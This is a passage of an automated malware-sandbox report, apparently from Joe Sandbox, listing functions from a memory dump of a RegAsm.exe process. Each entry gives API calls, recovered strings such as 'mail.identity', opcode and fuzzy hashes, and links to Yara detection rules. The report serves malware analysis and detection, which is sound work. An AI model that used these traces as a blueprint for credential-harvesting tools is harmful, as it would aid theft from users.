                                                                                                                                                                                APIs
                                                                                                                                                                                • memcpy.MSVCRT(00000000,?,00000000), ref: 0043007E
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memcpy
                                                                                                                                                                                • String ID: $, $CREATE TABLE
                                                                                                                                                                                • API String ID: 3510742995-3459038510
                                                                                                                                                                                • Opcode ID: ec2d01fe33c012397d4d1731dfc45432bb5b9ee0a9ad26789851577151ff7e1c
                                                                                                                                                                                • Instruction ID: b8263f634f048474639948e4306e081d81924a11902ad0262d34aeb61c893b0c
                                                                                                                                                                                • Opcode Fuzzy Hash: ec2d01fe33c012397d4d1731dfc45432bb5b9ee0a9ad26789851577151ff7e1c
                                                                                                                                                                                • Instruction Fuzzy Hash: C351A472D00129DFCF10CF94D541AAFB7F4EF49319F61406BE840EB205E778AA4A8B98
                                                                                                                                                                                Function 00402624 Relevance: 6.1, APIs: 4, Instructions: 127COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 004026E4
                                                                                                                                                                                • memset.MSVCRT ref: 004026AD
                                                                                                                                                                                  • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                                                                                                                                                                  • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                                                                                                                                                                  • Part of subcall function 004108E5: memcpy.MSVCRT(?,00000000,?,00000001,?,?,?,00000000), ref: 00410961
                                                                                                                                                                                  • Part of subcall function 004108E5: CoTaskMemFree.OLE32(00000000), ref: 00410970
                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 0040279C
                                                                                                                                                                                • LocalFree.KERNEL32(?), ref: 004027A6
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ByteCharFreeFromMultiStringUuidWide$LocalQueryTaskValuememcpymemset
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3503910906-0
                                                                                                                                                                                • Opcode ID: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                                                                                                                                                                                • Instruction ID: aa14e43d8b473801bf9d2631992dc1640396fa6537153de3cc175e43cdbeb3f4
                                                                                                                                                                                • Opcode Fuzzy Hash: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                                                                                                                                                                                • Instruction Fuzzy Hash: 0B4183B1408384BFD711DB60CD85AAB77D8AF89314F044A3FF998A31C1D679DA44CB5A
                                                                                                                                                                                Function 0040C8B8 Relevance: 6.1, APIs: 4, Instructions: 115windowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 0040C922
                                                                                                                                                                                • SendMessageA.USER32(00000000,00000423,00000000,00000000), ref: 0040C966
                                                                                                                                                                                • GetMenuStringA.USER32(?,00000103,?,0000004F,00000000), ref: 0040C980
                                                                                                                                                                                • PostMessageA.USER32(?,00000402,00000000,00000000), ref: 0040CA23
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Message$MenuPostSendStringmemset
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3798638045-0
                                                                                                                                                                                • Opcode ID: baefdefab252ba5ebdbc5dbfb72098888a57285fb2abb1b9f47d437d3554fda2
                                                                                                                                                                                • Instruction ID: 1bc0f942f430aed347c7303033341c470b8779a554354b53929018aa447f6f2a
                                                                                                                                                                                • Opcode Fuzzy Hash: baefdefab252ba5ebdbc5dbfb72098888a57285fb2abb1b9f47d437d3554fda2
                                                                                                                                                                                • Instruction Fuzzy Hash: A241D071600215EBCB24CF24C8C5B97B7A4BF05325F1483B6E958AB2D2C3789D81CBD8
                                                                                                                                                                                Function 0040B5E5 Relevance: 6.1, APIs: 4, Instructions: 114stringCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00409DED: ??2@YAPAXI@Z.MSVCRT ref: 00409E0E
                                                                                                                                                                                  • Part of subcall function 00409DED: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00409ED5
                                                                                                                                                                                • strlen.MSVCRT ref: 0040B60B
                                                                                                                                                                                • atoi.MSVCRT(?), ref: 0040B619
                                                                                                                                                                                • _mbsicmp.MSVCRT ref: 0040B66C
                                                                                                                                                                                • _mbsicmp.MSVCRT ref: 0040B67F
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _mbsicmp$??2@??3@atoistrlen
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 4107816708-0
                                                                                                                                                                                • Opcode ID: 481fecb55ebe7fb47740a6b69fad8160bec1c4c1e9b6d2800cf49c311f8ba602
                                                                                                                                                                                • Instruction ID: e44d10e2ba05df3f3c4ea20365ac2b40f6a529c5f902ff1350b2aa0f2f7d2ce1
                                                                                                                                                                                • Opcode Fuzzy Hash: 481fecb55ebe7fb47740a6b69fad8160bec1c4c1e9b6d2800cf49c311f8ba602
                                                                                                                                                                                • Instruction Fuzzy Hash: 3A413D35900204EFCF10DFA9C481AA9BBF4FF48348F1144BAE815AB392D739DA41CB99
                                                                                                                                                                                Function 004113B2 Relevance: 6.1, APIs: 4, Instructions: 85stringCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041140E
                                                                                                                                                                                • _gmtime64.MSVCRT ref: 00411437
                                                                                                                                                                                • memcpy.MSVCRT(?,00000000,00000024,?,?,000003E8,00000000), ref: 0041144B
                                                                                                                                                                                • strftime.MSVCRT ref: 00411476
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_gmtime64memcpystrftime
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1886415126-0
                                                                                                                                                                                • Opcode ID: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                                                                                                                                                                                • Instruction ID: 0fc2308174198aa020173da426f8fce31fb0284c5be342abf897f659f69a0370
                                                                                                                                                                                • Opcode Fuzzy Hash: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                                                                                                                                                                                • Instruction Fuzzy Hash: 6F21E472A013145BD320EB69C846B5BB7D8AF44734F044A1FFAA8D73D1D738E9448699
                                                                                                                                                                                Function 00444462 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 84stringCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: strlen
                                                                                                                                                                                • String ID: >$>$>
                                                                                                                                                                                • API String ID: 39653677-3911187716
                                                                                                                                                                                • Opcode ID: fe8035a2bc0feec0fd3c25fdeb621276a2bec91dd981480682d5a40b5cd82bd5
                                                                                                                                                                                • Instruction ID: 00f684ae2741cafacb4c0f359147db44c9a3c2c025b4d94400920e38b4f60055
                                                                                                                                                                                • Opcode Fuzzy Hash: fe8035a2bc0feec0fd3c25fdeb621276a2bec91dd981480682d5a40b5cd82bd5
                                                                                                                                                                                • Instruction Fuzzy Hash: E131261180D6C4AEEB11CFA880463EEFFB05FA2304F5886DAD0D047743C67C964AC3AA
                                                                                                                                                                                Function 0040D205 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                                                                                                                                • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                                                                                                                                • memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memcpy
                                                                                                                                                                                • String ID: @
                                                                                                                                                                                • API String ID: 3510742995-2766056989
                                                                                                                                                                                • Opcode ID: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                                                                                                                                                • Instruction ID: 6d1199ef97cb2679a5b3fe4a4c98cea7b7ae300cfbacc21e3dff9814a3884c4c
                                                                                                                                                                                • Opcode Fuzzy Hash: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                                                                                                                                                • Instruction Fuzzy Hash: 41113DB2E007046BDB288E96DC80D5A77A8EFA0354700013FFE06662D1F639EA5DC7D8
                                                                                                                                                                                Function 00407FA4 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 00407FD9
                                                                                                                                                                                • memset.MSVCRT ref: 00407FEA
                                                                                                                                                                                • memcpy.MSVCRT(0045791C,?,?,00000000,00000000,?,00000000,?,?,0040140F,?,?,?,?,00454020,0000000C), ref: 00407FF6
                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 00408003
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ??2@??3@memcpymemset
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1865533344-0
                                                                                                                                                                                • Opcode ID: bfbd24b6eb9f059b1fc6dbc4b2d82ea2ef06db4a5dbaa2566208e2b96fd1a008
                                                                                                                                                                                • Instruction ID: b86030d1d6bc714dc1ef3b289d30c8af6c7ebcab3ecced31442563250122d8c5
                                                                                                                                                                                • Opcode Fuzzy Hash: bfbd24b6eb9f059b1fc6dbc4b2d82ea2ef06db4a5dbaa2566208e2b96fd1a008
                                                                                                                                                                                • Instruction Fuzzy Hash: 9D116A752046019FE328DF19C881B26F7E5FFD8300B21882EE5DA97385DA35E801CB64
                                                                                                                                                                                Function 0040E1C8 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 59COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _strcmpi
                                                                                                                                                                                • String ID: C@$mail.identity
                                                                                                                                                                                • API String ID: 1439213657-721921413
                                                                                                                                                                                • Opcode ID: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
                                                                                                                                                                                • Instruction ID: e081b0b03caa8c584547328dd3c7b46ba64ccdb110812537a35def5e1e6d8c92
                                                                                                                                                                                • Opcode Fuzzy Hash: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
                                                                                                                                                                                • Instruction Fuzzy Hash: DD110A325002199BEB20AA65DC41E8A739CEF00358F10453FF545B6182EF38F9598B98
                                                                                                                                                                                Function 00410C68 Relevance: 6.1, APIs: 4, Instructions: 58COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • FindResourceA.KERNEL32(?,?,?), ref: 00410C75
                                                                                                                                                                                • SizeofResource.KERNEL32(?,00000000), ref: 00410C86
                                                                                                                                                                                • LoadResource.KERNEL32(?,00000000), ref: 00410C96
                                                                                                                                                                                • LockResource.KERNEL32(00000000), ref: 00410CA1
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3473537107-0
                                                                                                                                                                                • Opcode ID: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                                                                                                                                                                                • Instruction ID: 06b8370cebe37c7de172ca18b7cbf64f7437cd91f528590ddf6fb1777473d23a
                                                                                                                                                                                • Opcode Fuzzy Hash: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                                                                                                                                                                                • Instruction Fuzzy Hash: 090196367012166F8B185F69DD9489F7EAEFB853913084136FC05C6361EB71C9818ED8
                                                                                                                                                                                Function 00410F10 Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • SHGetMalloc.SHELL32(?), ref: 00410F20
                                                                                                                                                                                • SHBrowseForFolder.SHELL32(?), ref: 00410F52
                                                                                                                                                                                • SHGetPathFromIDList.SHELL32(00000000,?), ref: 00410F66
                                                                                                                                                                                • _mbscpy.MSVCRT(?,?), ref: 00410F79
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: BrowseFolderFromListMallocPath_mbscpy
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1479990042-0
                                                                                                                                                                                • Opcode ID: 3021ac6996c314945b367224c7bd8111e1d6ec744ed02b95fe82b7a37a02f8bd
                                                                                                                                                                                • Instruction ID: 6920bf835a9bb06566ba915c59caace60c79acb7cf9a25d2f41614c9f7770f55
                                                                                                                                                                                • Opcode Fuzzy Hash: 3021ac6996c314945b367224c7bd8111e1d6ec744ed02b95fe82b7a37a02f8bd
                                                                                                                                                                                • Instruction Fuzzy Hash: D411ECB5900208AFDB10DFE5D985AEEB7F8FB49314B10446AE505E7200D7B4DA458B64
                                                                                                                                                                                Function 00406620 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 50COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 00406640
                                                                                                                                                                                  • Part of subcall function 004063B2: memset.MSVCRT ref: 0040644F
                                                                                                                                                                                  • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                                                                                                                                                                  • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                                                                                                                                                                • memcmp.MSVCRT ref: 00406672
                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000018,?,00000060,?,?,00000000,00000000), ref: 00406695
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memcpy$memset$memcmp
                                                                                                                                                                                • String ID: Ul@
                                                                                                                                                                                • API String ID: 270934217-715280498
                                                                                                                                                                                • Opcode ID: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                                                                                                                                                                • Instruction ID: 50cfa42ee3f36d69bd2a91aaf20a03d2fa08f341615043147a7a382cdea3e611
                                                                                                                                                                                • Opcode Fuzzy Hash: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                                                                                                                                                                • Instruction Fuzzy Hash: 46017572A0020C6BEB10DAA58C06FEF73ADAB44705F450436FE49F2181E679AA1987B5
                                                                                                                                                                                Function 0040B903 Relevance: 6.0, APIs: 4, Instructions: 45windowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                                                                                                                                                                                  • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001), ref: 00408EBE
                                                                                                                                                                                • sprintf.MSVCRT ref: 0040B929
                                                                                                                                                                                • SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B98C
                                                                                                                                                                                  • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,00403F8E,0044C530), ref: 00408E31
                                                                                                                                                                                  • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                                                                                                                                • sprintf.MSVCRT ref: 0040B953
                                                                                                                                                                                • _mbscat.MSVCRT ref: 0040B966
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: sprintf$LoadMessageSendString_mbscat_mbscpymemcpystrlen
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 203655857-0
                                                                                                                                                                                • Opcode ID: e7a96a4b3b60773b868b861c6ef1878d2d31708076d5e2e16fac633899c29946
                                                                                                                                                                                • Instruction ID: 0d6227c2dffbdb2154d3321facad49e181a647ebd34d8d5e6c5aab0b846496ed
                                                                                                                                                                                • Opcode Fuzzy Hash: e7a96a4b3b60773b868b861c6ef1878d2d31708076d5e2e16fac633899c29946
                                                                                                                                                                                • Instruction Fuzzy Hash: EE0117B2500308A6E721EB75DC87FE773ACAB54704F04046AB659B61C3DA78E5444A59
                                                                                                                                                                                Function 0040ADC5 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 41COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 0040ADE8
                                                                                                                                                                                • memset.MSVCRT ref: 0040ADFE
                                                                                                                                                                                  • Part of subcall function 0040A4E6: _mbscpy.MSVCRT(00000000,?,0040ABD2,?,?,?), ref: 0040A4EB
                                                                                                                                                                                  • Part of subcall function 0040A4E6: _strlwr.MSVCRT ref: 0040A52E
                                                                                                                                                                                • sprintf.MSVCRT ref: 0040AE28
                                                                                                                                                                                  • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                                                                                                                  • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00406D4D
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memset$FileWrite_mbscpy_strlwrsprintfstrlen
                                                                                                                                                                                • String ID: </%s>
                                                                                                                                                                                • API String ID: 3699762281-259020660
                                                                                                                                                                                • Opcode ID: f78139877eceb876a4a519055c942f2d4715b4df0d29a6dcbc188ebede795ba7
                                                                                                                                                                                • Instruction ID: ff04cb2e9b10d1c503b051559ee948e99af9d8289afd69eb184e92e88926625d
                                                                                                                                                                                • Opcode Fuzzy Hash: f78139877eceb876a4a519055c942f2d4715b4df0d29a6dcbc188ebede795ba7
                                                                                                                                                                                • Instruction Fuzzy Hash: CF01F97290012967E721A619CC46FDEB76C9F54304F0500FAB50DF3142DA74AA448BA5
                                                                                                                                                                                Function 0041865B Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 243COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 004176F4: memcmp.MSVCRT ref: 004177B6
                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418726
                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418770
                                                                                                                                                                                Strings
                                                                                                                                                                                • recovered %d pages from %s, xrefs: 004188B4
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$memcmp
                                                                                                                                                                                • String ID: recovered %d pages from %s
                                                                                                                                                                                • API String ID: 985450955-1623757624
                                                                                                                                                                                • Opcode ID: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                                                                                                                                                                                • Instruction ID: 98aa3c95e39363207900286e283e4ca218167c091a2ac8f6aa08d387a6555cb7
                                                                                                                                                                                • Opcode Fuzzy Hash: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                                                                                                                                                                                • Instruction Fuzzy Hash: BA81AF759006049FDB25DBA8C880AEFB7F6EF84324F25441EE95597381DF38AD82CB58
                                                                                                                                                                                Function 004021FF Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _ultoasprintf
                                                                                                                                                                                • String ID: %s %s %s
                                                                                                                                                                                • API String ID: 432394123-3850900253
                                                                                                                                                                                • Opcode ID: 16242442a3dc2496cbd1affae0ffec3615c5459b66bdf10bcc66490599bfb82e
                                                                                                                                                                                • Instruction ID: 5b4e28b1b4fc8494891684f3550fd3cb18a3cec27640a2844273e51cea36df92
                                                                                                                                                                                • Opcode Fuzzy Hash: 16242442a3dc2496cbd1affae0ffec3615c5459b66bdf10bcc66490599bfb82e
                                                                                                                                                                                • Instruction Fuzzy Hash: 80412331504A15C7C93595648B8DBEBA3A8BB46300F5804BFDCAAB32C0D3FCAD42865E
                                                                                                                                                                                Function 00409901 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41windowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 00409919
                                                                                                                                                                                • SendMessageA.USER32(N\@,00001019,00000000,?), ref: 00409948
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MessageSendmemset
                                                                                                                                                                                • String ID: N\@
                                                                                                                                                                                • API String ID: 568519121-3851889168
                                                                                                                                                                                • Opcode ID: 2010a019ef781dd6939f17f8e62f95d5074ac9a6fd296138cb71cbff55b3af76
                                                                                                                                                                                • Instruction ID: 8500237f8b168207f1c9a25e89cff2ec53edf3448a21c69821c5a9264d9502ca
                                                                                                                                                                                • Opcode Fuzzy Hash: 2010a019ef781dd6939f17f8e62f95d5074ac9a6fd296138cb71cbff55b3af76
                                                                                                                                                                                • Instruction Fuzzy Hash: 3C016279800205AADB209F59C845AEBB7F8FF85B45F00802DE894B6241D374A945CB79
                                                                                                                                                                                Function 00409070 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21windowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • LoadMenuA.USER32(00000000), ref: 00409078
                                                                                                                                                                                • sprintf.MSVCRT ref: 0040909B
                                                                                                                                                                                  • Part of subcall function 00408F1B: GetMenuItemCount.USER32(?), ref: 00408F31
                                                                                                                                                                                  • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408F55
                                                                                                                                                                                  • Part of subcall function 00408F1B: GetMenuItemInfoA.USER32(?), ref: 00408F8B
                                                                                                                                                                                  • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408FB8
                                                                                                                                                                                  • Part of subcall function 00408F1B: strchr.MSVCRT ref: 00408FC4
                                                                                                                                                                                  • Part of subcall function 00408F1B: _mbscat.MSVCRT ref: 0040901F
                                                                                                                                                                                  • Part of subcall function 00408F1B: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 0040903B
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
                                                                                                                                                                                • String ID: menu_%d
                                                                                                                                                                                • API String ID: 1129539653-2417748251
                                                                                                                                                                                • Opcode ID: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                                                                                                                                                • Instruction ID: bbc3668ae8aad1463aedfde5e5dd5b48340f77aa4c3989790123ead7330def9b
                                                                                                                                                                                • Opcode Fuzzy Hash: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                                                                                                                                                • Instruction Fuzzy Hash: 2ED0C260A4124036EA2023366C0AF4B1A099BC271AF14022EF000B20C3EBFC844482BE
                                                                                                                                                                                Function 004116E1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
